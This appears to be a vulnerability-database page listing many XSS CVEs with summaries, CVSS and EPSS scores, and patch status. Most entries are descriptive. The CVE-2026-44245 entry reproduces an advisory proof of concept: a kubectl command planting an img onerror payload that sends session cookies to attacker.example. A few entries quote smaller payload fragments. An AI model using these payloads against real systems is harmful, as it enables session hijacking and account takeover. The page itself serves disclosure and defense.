Skip to main content

XSS

38830 CVEs technique

Monthly

CVE-2026-42192 MEDIUM PATCH This Month

Plunk is an open-source email platform built on top of AWS SES. Prior to version 0.9.0, a stored cross-site scripting (XSS) vulnerability exists in the campaign management feature, where the email body content created by authenticated project members is stored and later rendered in the admin dashboard using React's dangerouslySetInnerHTML without any HTML sanitization. This allows a lower-privileged member to embed malicious scripts in a campaign's email body that execute in the context of any admin or other member who views the campaign, potentially enabling session hijacking or unauthorized actions on their behalf. This issue has been patched in version 0.9.0.

XSS Plunk
NVD GitHub
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-44737 PHP MEDIUM PATCH GHSA This Month

Stored cross-site scripting in Grav admin panel allows authenticated attackers to inject malicious JavaScript into page titles via the data[header][title] parameter, which is then executed when other administrators access the affected page or its move function. The vulnerability requires admin authentication to inject the payload but affects all subsequent viewers, enabling session hijacking, credential theft, and administrative impersonation. Publicly available exploit code exists with working proof-of-concept screenshots.

XSS RCE
NVD GitHub
CVSS 4.0
6.2
EPSS
0.0%
CVE-2026-44588 Go CRITICAL PATCH GHSA Act Now

Remote code execution in SiYuan's Electron renderer occurs when users hover over search results, file tree items, or attribute view elements containing URL-encoded XSS payloads in document titles or metadata. The vulnerability chains a URL-decoding step (decodeURIComponent) with unsafe innerHTML assignment in tooltip rendering, bypassing the escapeAriaLabel sanitizer that only handles HTML entities but ignores %XX URL escapes. Because SiYuan's renderer runs with nodeIntegration:true and contextIsolation:false, the XSS escalates to arbitrary code execution via require('child_process'). Exploitation requires user interaction (hovering) but no authentication, and malicious payloads survive .sy.zip export/import and sync replication, enabling supply-chain and shared-workspace attacks. No public exploit code identified at time of analysis, though detailed proof-of-concept is published in the GitHub advisory.

Microsoft XSS Python RCE Apple +2
NVD GitHub VulDB
CVSS 4.0
9.4
EPSS
0.1%
CVE-2026-44721 LIB HIGH PATCH GHSA This Week

Stored cross-site scripting in Open WebUI versions 0.3.5 through 0.8.12 allows authenticated users with model creation permission to inject malicious JavaScript via markdown-link payloads in model descriptions. Attackers craft markdown links with javascript: URIs (e.g., [text](javascript:alert())) that bypass sanitization, are parsed into executable anchor tags by marked.parse(), and rendered unsafely via Svelte's {@html} directive. Successful exploitation enables session token theft from localStorage and full account takeover of admins and other users who view the malicious model in the chat UI. This represents a pipeline-ordering flaw distinct from CVE-2024-7990, which exploited a video-tag restoration logic removed in v0.4.0. Fix confirmed in v0.9.0 (commit 5eab125) via DOMPurify post-processing. EPSS data not provided; CVSS 7.3 reflects network attack vector with low complexity but required authentication and user interaction, limiting automated exploitation.

XSS RCE Python
NVD GitHub VulDB
CVSS 3.1
7.3
EPSS
0.0%
CVE-2026-44429 Go MEDIUM PATCH GHSA This Month

Stored cross-site scripting in MCP Registry's catalogue UI allows any user with a publish token to inject arbitrary event handlers via the `websiteUrl` field by breaking out of an `href` attribute with an unescaped double-quote character. The server-side URL validator accepts quotes and the client-side `escapeHtml` helper fails to encode them in attribute context, enabling attackers to execute JavaScript on the registry.modelcontextprotocol.io origin with access to localStorage, XHR, and auth tokens. Vendor-released patch version 1.7.7 available; actively confirmed via proof-of-concept.

Canonical XSS Microsoft
NVD GitHub VulDB
CVSS 4.0
5.1
EPSS
0.0%
CVE-2026-44212 PHP CRITICAL PATCH GHSA Act Now

Stored XSS in PrestaShop back-office Customer Service enables unauthenticated attackers to achieve full back-office takeover via malicious Contact Us form submissions. The vulnerability affects PrestaShop versions prior to 8.2.6 and 9.0.0-9.1.0, with patches released in versions 8.2.6 and 9.1.1. Despite the 9.3 CVSS score reflecting critical severity due to network attack vector, low complexity, and scope change, the CVSS UI:R requirement (user interaction) means exploitation requires a back-office employee to open the malicious customer thread. No public exploit code has been identified at time of analysis, and the vulnerability is not listed in CISA KEV, indicating no confirmed widespread active exploitation despite the critical impact potential.

XSS Microsoft
NVD GitHub
CVSS 3.1
9.3
EPSS
0.1%
CVE-2026-44670 Go CRITICAL PATCH GHSA Act Now

Remote code execution in SiYuan's Electron desktop application allows authenticated attackers (or browser extensions on localhost) to inject malicious JavaScript through unescaped Attribute View names, escalating from stored XSS to arbitrary system command execution. The Go kernel backend stores AV names without HTML escaping, then embeds them via string replacement into HTML templates pushed over WebSocket. Three TypeScript renderer paths (render.ts, Title.ts, transaction.ts) consume this data using innerHTML/outerHTML without sanitization. Because the Electron main window runs with nodeIntegration:true and contextIsolation:false, script injection grants full Node.js API access—enabling attackers to spawn child processes (calc.exe/xcalc demonstrated in PoC), exfiltrate SSH keys, install backdoors, or pivot to cloud credentials. Payloads persist in JSON files under data/storage/av/, replicate across all sync transports (S3/WebDAV/cloud), survive .sy.zip export-import, and trigger for any user role (Administrator/Editor/Reader/Visitor) opening a document bound to the poisoned database view. CVSS 9.4 (Network/Low/None/High Confidentiality-Integrity-Availability + Scope Changed) reflects worst-case remote network vector, though the primary realistic attack path is via installed browser extensions (chrome-extension:// Origin explicitly allowlisted in session.go:277) calling the /api/transactions endpoint as an auto-granted admin on default installations with no Access Authorization Code. GitHub advisory GHSA-2h64-c999-c9r6 confirms patch available in kernel commit 0.0.0-20260512140701-d7b77d945e0d. No public exploit code identified at time of analysis, but detailed reproduction steps with curl payloads and Electron DevTools inspection are published in the advisory.

Microsoft Node.js XSS RCE Apple +2
NVD GitHub
CVSS 4.0
9.4
EPSS
0.1%
CVE-2026-42030 MEDIUM PATCH This Month

Reflected XSS in MapServer 6.0 through 8.6.1 allows unauthenticated remote attackers to inject arbitrary HTML and JavaScript into the browsers of users clicking crafted WMS URLs. The vulnerability exists in the OpenLayers template when FORMAT=application/openlayers is combined with an unsanitized SRS parameter in WMS 1.3.0 requests. MapServer 8.6.2 patches this issue, and no public exploit code or active exploitation has been confirmed, though the attack requires user interaction (clicking a malicious link).

XSS Mapserver
NVD GitHub VulDB
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-41886 npm HIGH PATCH This Week

Cross-origin DOM XSS and handler hijacking in the locize client SDK (browser module) allows remote attackers to execute arbitrary JavaScript, steal translation content, and manipulate the InContext editor UI. Attackers exploit missing postMessage origin validation by crafting messages from any embedded iframe, opened window, or parent frame that shares a window reference with a locize-enabled page. The vulnerability affects all versions prior to 4.0.21, with the vendor confirming exploitation through multiple handler paths (editKey, commitKeys, isLocizeEnabled, requestPopupChanges). No public exploit identified at time of analysis, though the GitHub security advisory provides detailed exploitation vectors including innerHTML injection, attribute-based XSS (onclick, href="javascript:"), and API endpoint hijacking to intercept translation data.

XSS Locize
NVD GitHub
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-42794 LOW PATCH Monitor

Reflected cross-site scripting (XSS) in absinthe_plug GraphiQL interface allows unauthenticated attackers to execute arbitrary JavaScript in victims' browsers via the query GET parameter. The vulnerability exploits incomplete input escaping in the js_escape/1 function, which fails to escape backslashes before embedding user-controlled query strings into inline JavaScript. An attacker can bypass existing single-quote and newline escaping by prefixing a quote with a backslash (e.g., \'), breaking out of the string context. Vendor-released patch available (version 1.10.2 and later); exploitation requires user interaction (clicking a malicious link).

XSS Absinthe Plug
NVD GitHub VulDB
CVSS 4.0
2.3
EPSS
0.0%
CVE-2026-41576 HIGH PATCH This Week

HTML injection in Brave CMS 2.0 contact form allows remote attackers to inject arbitrary HTML markup into administrative notification emails. The unauthenticated contact form passes user-supplied message text through nl2br() without HTML escaping, then renders it using Blade's unescaped {!! $msg !!} directive. While JavaScript execution is blocked by modern email clients, attackers can craft convincing phishing interfaces within the email body to target administrators. Upstream fix available via commit 6c56603, which implements HTML escaping using Laravel's e() helper function. EPSS and KEV data not provided. GitHub source diff confirms the vulnerability in ContactController.php and documents the server-side sanitization fix.

XSS Microsoft
NVD GitHub
CVSS 3.1
7.1
EPSS
0.1%
CVE-2026-41575 MEDIUM PATCH This Month

DOM-based cross-site scripting (XSS) in th30d4y/IP versions 1.0.1 through 2.0.0 allows remote attackers to execute arbitrary JavaScript in a victim's browser by crafting malicious input to the IP Reputation Checker application. The vulnerability requires user interaction (clicking a malicious link) but affects all users of vulnerable versions. Vendor-released patch: version 2.0.1.

XSS W4Nn4D13 Ip
NVD GitHub
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-41524 HIGH PATCH This Week

Stored cross-site scripting (XSS) in Brave CMS 2.0 allows authenticated users with editor privileges to inject malicious JavaScript through the CKEditor rich-text interface, achieving persistent code execution in all visitors' browsers. The vulnerability stems from Laravel Blade's unescaped output directive {!! !!} rendering user-supplied content without sanitization. Patched via commit 6c56603 which implements HtmlSanitizer to allowlist safe HTML tags and strip dangerous attributes before database storage.

XSS
NVD GitHub
CVSS 3.1
8.7
EPSS
0.0%
CVE-2026-7475 MEDIUM This Month

Stored cross-site scripting in Sky Addons plugin for WordPress (versions up to 3.3.2) allows authenticated attackers with Author-level access to inject arbitrary JavaScript via the REST API that persists in the `sky-custom-scripts` post type and executes on all frontend pages for every site visitor. The vulnerability stems from insufficient input sanitization on the `sky_script_content` meta field combined with lack of output escaping during frontend rendering. No public exploit code or active exploitation has been identified at time of analysis, but the attack requires only Author-level privileges and standard REST API access, making it a practical threat in multi-user WordPress environments.

XSS WordPress Elementor
NVD
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-5341 MEDIUM This Month

Stored Cross-Site Scripting (XSS) in the NMR Strava Activities WordPress plugin through version 1.0.14 allows authenticated contributors and above to inject arbitrary JavaScript into pages via the `strava_nmr_connect` shortcode due to insufficient input sanitization and output escaping. The injected scripts execute in the context of any user viewing the affected page, compromising session security and enabling account takeover or malware distribution. A vendor patch addressing the vulnerability is available in version 1.0.15.

XSS WordPress
NVD
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-7650 MEDIUM This Month

Stored Cross-Site Scripting in E2Pdf - Export Pdf Tool for WordPress plugin versions up to 1.32.17 allows authenticated attackers with Contributor-level access to inject arbitrary JavaScript via the 'id' attribute of the e2pdf-download shortcode, which executes when any user views the affected page. The vulnerability stems from insufficient input sanitization and output escaping on shortcode attributes, enabling persistent script injection with moderate confidentiality and integrity impact across site scopes.

XSS WordPress
NVD
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-7330 HIGH This Week

Stored Cross-Site Scripting in Auto Affiliate Links for WordPress allows unauthenticated remote attackers to inject malicious JavaScript into administrator statistics pages through an unprotected AJAX endpoint. The vulnerability stems from missing input sanitization on the 'url' parameter in aal_url_stats_save_action() combined with direct output of stored values in aal_display_clicks() without escaping. Attackers can exploit a publicly exposed nonce and the wp_ajax_nopriv_ hook to store malicious payloads that execute when administrators view click statistics, potentially leading to session hijacking, privilege escalation, or site compromise. Wordfence reported this vulnerability affecting versions through 6.8.8, with a patch released in version 6.8.8.1.

XSS WordPress
NVD VulDB
CVSS 3.1
7.2
EPSS
0.2%
CVE-2026-8136 LOW POC Monitor

Cross-site scripting (XSS) in SourceCodester Pharmacy Sales and Inventory System 1.0 allows high-privileged users with user interaction to inject malicious scripts via the Name parameter in /index.php?page=users, affecting application integrity with low severity. The vulnerability requires administrative privileges and user interaction to exploit, limiting real-world impact despite public exploit availability.

XSS PHP
NVD VulDB GitHub
CVSS 4.0
1.9
EPSS
0.0%
CVE-2026-42150 PyPI MEDIUM PATCH This Month

Cross-site scripting in wlc command-line client versions prior to 2.0.0 allows authenticated users with high privileges to inject malicious HTML/JavaScript into API responses, which are then embedded unescaped in HTML output. When the HTML output is rendered in a browser, this enables XSS attacks. The vulnerability requires explicit use of the HTML output format (non-default), user interaction to open/view the HTML file, and elevated API credentials, limiting real-world risk despite the network vector.

XSS Wlc
NVD GitHub
CVSS 3.1
5.1
EPSS
0.0%
CVE-2026-8117 LOW Monitor

Reflected cross-site scripting (XSS) in SourceCodester Pizzafy Ecommerce System 1.0 via the page parameter in /admin/index.php allows remote attackers to inject malicious scripts that execute in a victim's browser with user interaction. CVSS 2.1 (low) reflects the requirement for user click-through; however, the vulnerability is disclosed publicly with proof-of-concept code available.

XSS PHP
NVD GitHub VulDB
CVSS 4.0
2.1
EPSS
0.0%
CVE-2022-23961 MEDIUM This Month

In Thruk Monitoring through 2.46.3, the login field of the login form is vulnerable to reflected XSS. Rated medium severity (CVSS 6.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

XSS
NVD
CVSS 3.1
6.1
EPSS
0.1%
CVE-2024-33724 MEDIUM POC This Month

SOPlanning 1.52.00 is vulnerable to Cross Site Scripting (XSS) via the groupe_id parameter to process/groupe_save.php. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

PHP XSS
NVD GitHub
CVSS 3.1
5.4
EPSS
1.4%
CVE-2023-42345 Maven MEDIUM PATCH This Month

A Cross Site Scripting vulnerability in Alkacon OpenCms before 16 exists via updateModelGroups.jsp. Rated medium severity (CVSS 6.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. This Cross-Site Scripting (XSS) vulnerability could allow attackers to inject malicious scripts into web pages viewed by other users.

XSS
NVD VulDB
CVSS 3.1
6.1
EPSS
0.1%
CVE-2023-42343 Maven MEDIUM POC PATCH This Month

A Cross Site Scripting vulnerability in Alkacon OpenCms before 10.5.1 exists via cmis-online/type. Rated medium severity (CVSS 6.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available.

XSS
NVD VulDB
CVSS 3.1
6.1
EPSS
0.6%
CVE-2026-8106 MEDIUM This Month

Reflected HTML injection in GitHub Enterprise Server Management Console login page allows credential theft when administrators click crafted links. The /setup/unlock endpoint reflects the redirect_to query parameter into an HTML attribute without sanitization, enabling attackers to inject malicious form elements that capture credentials. Affects versions 3.19.1-3.19.5 and 3.20.0-3.20.1; fixed in 3.19.6 and 3.20.2. Exploitation requires user interaction (administrator clicking a link), limiting real-world impact despite network-accessible attack surface.

XSS Enterprise Server
NVD GitHub VulDB
CVSS 4.0
5.9
EPSS
0.0%
CVE-2026-41929 MEDIUM PATCH This Month

Unauthenticated reflected cross-site scripting (XSS) in Vvveb before 1.0.8.2 allows remote attackers to execute arbitrary JavaScript in the context of the Vvveb origin by manipulating the r query parameter and _component_ajax POST parameter in the visual editor preview renderer. The vulnerability exploits the absence of session, role, or token verification in the isEditor() gating function combined with unsanitized injection of POST body content, requiring only user interaction to trigger but affecting all versions prior to 1.0.8.2. Active exploitation status is not confirmed, but a vendor-released patch is available.

XSS Vvveb
NVD GitHub
CVSS 4.0
5.1
EPSS
0.0%
CVE-2026-32207 HIGH PATCH NEWS NO ACTION HOSTED Monitor

Cross-site scripting (XSS) in Azure Machine Learning enables remote attackers to execute arbitrary JavaScript in victim browsers via crafted input, achieving complete session compromise including credential theft, workspace manipulation, and model poisoning. Attacker requires no authentication but must convince a user to interact with a malicious link or input. Microsoft has released patches per MSRC advisory. CVSS 8.8 severity reflects the high impact across confidentiality, integrity, and availability once user interaction occurs. No evidence of active exploitation (not in CISA KEV) and EPSS data not provided.

XSS Microsoft
NVD VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-41692 npm MEDIUM PATCH This Month

DOM-based cross-site scripting (XSS) in i18nextify versions prior to 4.0.8 allows remote attackers to execute arbitrary JavaScript by injecting malicious URL schemes (javascript:, data:, vbscript:, file:) into translated href and src attribute values. An attacker who can compromise the translation backend, CDN, or intercept unencrypted traffic can inject payloads that execute with the origin's privileges when users interact with the affected links or embedded content. The vulnerability requires user interaction (clicking a link or loading a page with a malicious src) but affects any website using i18nextify with untrusted translation sources.

XSS I18Nextify
NVD GitHub VulDB
CVSS 3.1
4.7
EPSS
0.0%
CVE-2026-39823 Go MEDIUM PATCH This Month

Cross-site scripting (XSS) vulnerability in Go's html/template library allows attackers to bypass URL escaping in meta tag content attributes by inserting ASCII whitespaces around the equals sign, enabling injection of malicious scripts into web applications. Affects Go 1.25.x before 1.25.10 and 1.26.x before 1.26.3. This is a regression from CVE-2026-27142 where the fix was incomplete, and exploitation requires user interaction (UI:R) but operates across security boundaries (S:C).

XSS Html Template Red Hat
NVD VulDB
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-42877 PHP MEDIUM GHSA This Month

Stored XSS in FacturaScripts product search modal allows authenticated warehouse users to inject malicious JavaScript via product reference field, which executes in the browser of any user opening the search modal in sales or purchase documents. An attacker with warehouse write access can escalate privileges by executing arbitrary authenticated requests in an administrator's session, including creation of new admin accounts, without requiring the admin's password. The vulnerability exploits improper output encoding combined with HTML parser re-interpretation during innerHTML assignment.

XSS PHP Privilege Escalation
NVD GitHub VulDB
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-27964 PHP LOW GHSA Monitor

Reflected cross-site scripting in FacturaScripts allows authenticated attackers to execute arbitrary JavaScript via manipulation of the fsNick cookie parameter. The application renders the cookie value directly into the HTML without sanitization, permitting script execution before session termination and logout redirection. CVSS score is 3.9 with low impact due to login requirement and single-action execution window.

XSS
NVD GitHub
CVSS 3.1
3.9
EPSS
0.0%
CVE-2026-42239 npm HIGH PATCH GHSA This Week

Session hijacking via JavaScript-readable authentication cookies in Budibase versions prior to 3.35.10 allows any Cross-Site Scripting (XSS) vulnerability to escalate into full account takeover. The budibase:auth cookie containing the JWT session token is set with httpOnly: false, enabling JavaScript to read it via document.cookie. Combined with confirmed prior XSS vulnerabilities in Budibase (GHSA-gp5x-2v54-v2q5), attackers can exfiltrate session tokens and gain persistent access to victim accounts. The cookie also lacks secure and sameSite flags, exposing tokens over plaintext HTTP. No public exploit identified at time of analysis. EPSS data not available. Patch available in version 3.35.10.

XSS Budibase
NVD GitHub VulDB
CVSS 3.1
8.1
EPSS
0.0%
CVE-2026-41653 HIGH PATCH This Week

Cross-site scripting in BentoPDF's Markdown to PDF Tool allows remote attackers to execute arbitrary JavaScript when users interact with malicious Markdown content. Affects all versions prior to 2.8.3. Vendor-released patch version 2.8.3 available with immediate upgrade recommended by maintainer. No public exploit identified at time of analysis, though vulnerability was responsibly disclosed by independent researcher. CVSS 7.0 with network attack vector but requires user interaction, reducing automation potential.

XSS Bentopdf
NVD GitHub
CVSS 4.0
7.0
EPSS
0.0%
CVE-2026-44742 PyPI HIGH GHSA This Week

Cross-site scripting (XSS) in Postorius mail list management interface allows unauthenticated remote attackers to inject malicious scripts via crafted email subjects in held messages. Active exploitation confirmed in May 2026 per vendor disclosure. Affects all versions through 1.3.13. Public exploit code available via GitLab merge request #972. EPSS data not yet available for this recent CVE, but confirmed in-the-wild activity elevates priority significantly despite moderate CVSS 7.2 score.

XSS Postorius
NVD VulDB
CVSS 3.1
7.2
EPSS
0.0%
CVE-2026-41904 HIGH PATCH This Week

Stored XSS in FreeScout's auto-reply feature allows authenticated users with updateAutoReply permission to inject malicious scripts that execute in customer email clients. Every customer contacting the affected mailbox receives the weaponized auto-reply email, where the payload executes without CSP protection in webmail or email client contexts. The vulnerability affects FreeScout versions prior to 1.8.217, which contains the vendor-released patch. EPSS data not provided, no CISA KEV listing indicates limited observed exploitation despite the chain-reaction impact potential.

XSS Freescout
NVD GitHub
CVSS 3.1
7.6
EPSS
0.0%
CVE-2026-6735 HIGH PATCH This Week

Cross-site scripting (XSS) vulnerability in PHP 8.2.x (prior to 8.2.31) allows network-based attackers to inject malicious scripts that execute in victim browsers, compromising session tokens and potentially escalating to account takeover. Vendor-released patch (PHP 8.2.31) addresses this along with seven additional CVEs in a coordinated security release. CVSS 7.3 HIGH with user interaction required; exploitation status classified as POC-available per CVSS 4.0 vector (E:P), though public exploit code not independently verified at time of analysis.

XSS Microsoft PHP Suse Red Hat
NVD GitHub VulDB
CVSS 4.0
7.3
EPSS
0.0%
CVE-2026-36341 PHP MEDIUM PATCH This Month

Stored cross-site scripting (XSS) in Webkul Krayin CRM v2.1.5 allows authenticated users to inject malicious scripts via unsanitized input in the Activity comment field on the /admin/activities/create endpoint, which execute when viewed by other administrators. The vulnerability requires user interaction (viewing the compromised activity) and authenticated access, limiting scope to C (confidentiality) and I (integrity) with partial impact; publicly available proof-of-concept code exists but exploitation is not confirmed in the wild. Fixed in version v2.1.6 via application of input sanitization using strip_tags() across multiple vulnerable Blade templates.

XSS
NVD GitHub
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-41554 HIGH This Week

Reflected cross-site scripting in Bricks Builder WordPress theme through version 1.9.2 to 2.2 enables remote attackers to execute malicious JavaScript in victim browsers by crafting URLs with unsanitized input that gets reflected into generated web pages without proper encoding. Exploitation requires victim interaction (clicking a malicious link) but no authentication, making phishing and social engineering viable delivery methods. EPSS and KEV data not available; no public exploit confirmed at time of analysis, though Patchstack disclosure suggests security researchers have demonstrated the vulnerability.

XSS Bricks Builder
NVD
CVSS 3.1
7.1
EPSS
0.0%
CVE-2026-5784 HIGH PATCH This Week

Stored cross-site scripting in DivvyDrive 4.8.2.9 through 4.8.3.1 enables remote attackers to inject malicious scripts that execute in victim browsers with high integrity impact (CVSS 8.8). The vulnerability requires user interaction but no authentication, allowing attackers to compromise confidentiality, integrity, and availability of user sessions. Reported by TR-CERT with vendor patch released in version 4.8.3.2. No confirmed active exploitation (not in CISA KEV) and no public exploit code identified at time of analysis.

XSS Divvydrive
NVD
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-6002 HIGH PATCH This Week

Cross-site scripting (XSS) in DivvyDrive 4.8.2.9 through 4.8.3.1 allows remote unauthenticated attackers to execute arbitrary JavaScript in victim browsers, leading to session hijacking, credential theft, and malicious actions performed under victim's identity. The CVSS score of 8.8 (High) reflects the broad impact scope (confidentiality, integrity, availability all rated High), though user interaction is required. TR-CERT disclosure indicates awareness within Turkish government cybersecurity circles, but no CISA KEV listing or public exploit code identified at time of analysis, suggesting limited active exploitation outside potential targeted campaigns.

XSS Divvydrive
NVD
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-8080 MEDIUM PATCH This Month

Stored cross-site scripting in MISP before 2.5.37 allows authenticated users with template modification permissions to inject arbitrary JavaScript via unvalidated type and category fields in template element attributes. The vulnerability exploits insufficient input validation in the template element attribute handling logic, enabling attackers to store malicious payloads that execute in the browsers of other users viewing the affected templates. No public exploit code identified at time of analysis.

XSS Misp
NVD GitHub VulDB
CVSS 4.0
6.8
EPSS
0.0%
CVE-2026-3953 HIGH This Week

Cross-site scripting in Gosoft Proticaret E-Commerce v5.0.0 through v6.0.1767.1383 allows remote attackers to execute arbitrary JavaScript in victim browsers via crafted HTTP requests. Despite the 8.8 CVSS score indicating complete compromise (High C/I/A), the CVSS vector reveals this is a reflected XSS requiring user interaction (UI:R), not a stored or blind XSS. The vulnerability is unscoped (S:U), meaning impact is confined to the vulnerable application. No active exploitation confirmed via CISA KEV and no public exploit code identified at time of analysis. TR-CERT advisory available with remediation guidance.

XSS Proticaret E Commerce
NVD
CVSS 3.1
8.8
EPSS
0.0%
CVE-2025-62127 MEDIUM This Month

DOM-based cross-site scripting (XSS) in WEN Logo Slider WordPress plugin through version 3.4.0 allows authenticated high-privilege users to inject malicious scripts that execute in the browsers of other site visitors when the UI redirects the page, potentially compromising site integrity and user data. The vulnerability requires high-privilege administrator access and user interaction (page redirect), limiting its practical scope to insider threats or compromised admin accounts.

XSS Wen Logo Slider
NVD
CVSS 3.1
5.9
EPSS
0.0%
CVE-2026-27421 MEDIUM PATCH This Month

Stored cross-site scripting (XSS) in WProyal Royal Elementor Addons before version 1.7.1053 allows authenticated users with limited privileges to inject malicious scripts into web pages, which execute in the browsers of site visitors. The vulnerability requires user interaction (UI:R in CVSS) and is limited to users with login credentials (PR:L), but once stored, affects all visitors regardless of their privileges. An attacker with contributor or editor access can compromise website visitors, steal session cookies, or perform actions on their behalf.

XSS Royal Elementor Addons Elementor
NVD
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-44264 PyPI MEDIUM PATCH GHSA This Month

Cross-site scripting (XSS) via improper Markdown attribute sanitization in Weblate allows authenticated users to inject malicious HTML attributes through crafted Markdown in user comments and other user-provided content. The vulnerability affects Weblate versions prior to 5.17.1 and can be exploited by any authenticated user with the ability to submit Markdown content; however, the application's strict Content Security Policy (CSP) significantly mitigates actual exploitation risk. Vendor-released patch version 5.17.1 is available.

XSS Suse
NVD GitHub
CVSS 3.1
4.3
EPSS
0.0%
CVE-2025-67202 Ruby MEDIUM PATCH This Month

Sidekiq-cron thru 2.3.1, an open-source scheduling add-on for Sidekiq, is vulnerable to a cross-site scripting (xss) vulnerability via crafted URL being rended from cron.erb.

XSS N A Red Hat
NVD GitHub
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-36388 MEDIUM This Month

Stored Cross-Site Scripting in PHPGurukal Hospital Management System v4.0 allows authenticated patients to inject malicious scripts via the User Name parameter on the edit-profile.php page, with the payload later executed in the doctor's interface. The vulnerability requires user interaction (doctor viewing the profile) and affects confidentiality and integrity with limited scope. No public exploit code or active exploitation has been confirmed at analysis time.

XSS PHP N A
NVD GitHub
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-44455 npm MEDIUM PATCH GHSA This Month

HTML injection via unvalidated JSX tag names in hono allows attackers to inject arbitrary HTML elements and attributes when untrusted input is used as tag names during server-side rendering. The vulnerability affects hono versions prior to 4.12.16 when the `jsx()` or `createElement()` APIs process attacker-controlled tag names, potentially enabling XSS attacks. User interaction (rendering untrusted content) is required, and the issue is limited to applications that dynamically construct tag names from external sources rather than using static or allowlisted tags.

XSS
NVD GitHub
CVSS 3.1
4.7
EPSS
0.0%
CVE-2026-44245 Go MEDIUM PATCH GHSA This Month

### Summary Vue 3's v-html directive is the framework-documented mechanism for injecting raw HTML, and it intentionally disables the auto-escaping that {{ }} interpolation provides. The PropertyCard.vue component uses v-html for the else branch of the URL check, meaning any non-URL string value flows directly into the DOM as HTML. The isURL() guard only filters values that parse as http: or https: URLs, so any HTML payload not starting with those schemes (e.g., `<img src=x onerror=alert(1)>` padded to exceed 75 chars) bypasses it entirely. The data originates from Kubernetes PolicyReport .results[].properties fields, which are arbitrary string maps populated by policy engines and potentially by any principal with write access to PolicyReport objects in the cluster. No DOMPurify or equivalent HTML sanitization library is present anywhere in the frontend codebase, confirming there is no compensating control between the API response and the sink. This vulnerability was reproduced on the latest policy reporter UI version - 2.5.1. ### PoC Prerequisites: Kubernetes write access to PolicyReport resources in the target cluster (e.g., via a policy engine service account or direct kubectl access) Create a Kubernetes PolicyReport resource with a crafted property value longer than 75 characters. When an authenticated Policy Reporter UI user browses to the affected namespace and expands the result row containing this property, the injected script executes in their browser. ```bash kubectl apply -f - <<'EOF' apiVersion: [wgpolicyk8s.io/v1alpha2](http://wgpolicyk8s.io/v1alpha2) kind: PolicyReport metadata: name: xss-poc namespace: default results: - message: "test" policy: xss-test-policy rule: check-rule result: fail properties: # Value > 75 chars and not an http/https URL -> routed to v-html sink advisory: "<img src=x onerror=\"fetch('[https://attacker.example/c?c='+document.cookie](https://attacker.example/c?c=%27+document.cookie))\"> padding padding padding" EOF # Once a UI user opens the results table for the 'default' namespace # and expands the 'xss-test-policy' result row, the onerror handler fires # and exfiltrates their session cookies to attacker.example ``` <img width="1562" height="1061" alt="Снимок экрана - 2026-04-21 в 10 52 17" src="https://github.com/user-attachments/assets/fe542ccb-1662-44cb-802f-7998aa145db7" /> <img width="1041" height="939" alt="Снимок экрана - 2026-04-21 в 10 51 44" src="https://github.com/user-attachments/assets/bc07cf20-aea5-4a90-838f-c428d88a92b7" /> ### Impact XSS

Kubernetes XSS
NVD GitHub
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-42557 PyPI HIGH PATCH GHSA This Week

JupyterLab's CommandLinker executes arbitrary commands via single-click social engineering when users open malicious notebooks shared through email, GitHub, or Binder links. Attackers embed deceptive HTML buttons with allowlisted data-commandlinker-* attributes in pre-saved notebook output cells to trigger commands without code execution submission, enabling immediate arbitrary code execution in available kernels, silent file deletion, or resource exhaustion in multi-tenant deployments. The patched version 4.5.7 was released by the JupyterLab team through GitHub advisory GHSA-mqcg-5x36-vfcg. Chromium browser users face expanded terminal access risk through multi-click clipboard permission abuse. Third-party JupyterLab extensions increase attack surface by exposing additional commands to exploitation.

XSS RCE Google
NVD GitHub VulDB
CVSS 4.0
8.6
EPSS
0.1%
CVE-2026-42548 PHP HIGH PATCH GHSA This Week

Reflected cross-site scripting in Flight PHP framework's JSONP endpoint implementation allows remote attackers to execute arbitrary JavaScript in victim browsers by injecting malicious code through unvalidated callback parameters. Flight PHP versions prior to 3.18.1 concatenate user-supplied `jsonp` query parameters directly into JavaScript responses without identifier validation, enabling cookie theft and session hijacking when vulnerable endpoints are embedded via script tags. The vulnerability was patched in version 3.18.1 (commit b8dd23a) with regex validation limiting callbacks to legal JavaScript identifiers. A working proof-of-concept demonstrates cookie exfiltration via crafted callback parameters.

XSS PHP
NVD GitHub
CVSS 4.0
8.6
EPSS
0.0%
CVE-2026-42458 PHP MEDIUM PATCH GHSA This Month

Reflected cross-site scripting (XSS) in OpenMage Magento LTS versions up to 20.17.0 allows authenticated admin users to inject arbitrary JavaScript via the Import/Export Dataflow Profiles run interface. The vulnerability exists in the System → Import/Export → Dataflow Profiles page where unsanitized filename parameters are reflected into HTML context, enabling cookie theft and admin panel defacement. The exploitation requires admin panel access and user interaction to click a malicious link, but no network-based unauthenticated exploitation is possible.

XSS PHP
NVD GitHub
CVSS 4.0
5.3
EPSS
0.0%
CVE-2026-8022 LOW PATCH Monitor

Inappropriate implementation in MHTML in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who convinced a user to engage in specific UI gestures to leak cross-origin data via a crafted MHTML page. (Chromium security severity: Low)

XSS Google Chrome
NVD VulDB
CVSS 3.1
3.1
EPSS
0.0%
CVE-2026-8012 MEDIUM PATCH This Month

Inappropriate implementation in MHTML in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: Low)

XSS Google Red Hat Suse Chrome
NVD VulDB
